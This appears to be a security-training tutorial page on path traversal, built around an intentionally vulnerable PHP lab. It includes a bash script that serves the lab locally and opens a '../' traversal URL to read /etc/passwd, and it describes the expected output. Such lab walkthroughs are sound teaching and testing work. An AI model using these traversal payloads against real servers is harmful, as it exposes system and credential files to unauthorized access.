Path-Traversal

https://gitlab.com/jobertabma/vulnerable-code/-/tree/master/path-traversal?ref_type=heads

Step 1: Understand the Vulnerability

The provided PHP code contains a vulnerability due to the lack of sanitization on the page parameter. This allows an attacker to manipulate the page parameter to traverse directories and access unintended files.

Step 2: Create and Run the Bash Script

1.Create the Bash Script: Create a file named path-traversal.sh and add the provided Bash script to it.

#!/bin/bash

echo $1 > _tmp/strip

php -S 127.0.0.1:8080 -t path-traversal &

open 'http://127.0.0.1:8080/?page=../../../../../../../../../etc/passwd'

wait

- Explanation of the Script:

echo $1 > _tmp/strip: This line writes the first argument passed to the script into a file named strip in the _tmp directory.
php -S 127.0.0.1:8080 -t path-traversal&: This line starts a local PHP server on 127.0.0.1 (localhost) at port 8080, serving files from the path-traversal directory, and runs it in the background.
open 'http://127.0.0.1:8080/?page=../../../../../../../../../etc/passwd': Opens the default web browser and navigates to the URL exploiting the path traversal vulnerability
wait: This line waits for the background process (the PHP server) to finish

2.Make the Script Executable: Change the script's permissions to make it executable.

chmod +x path-traversal.sh

3. Run the script:

Expected Outcomes:

you should see the contents of the /etc/passwd file displayed in your web browser. This file typically contains user account information on Unix-like systems, demonstrating the unauthorized file access achieved via the path traversal vulnerability.

PreviousOpen-Redirect NextRemote Code Execution (RCE)

Last updated 1 year ago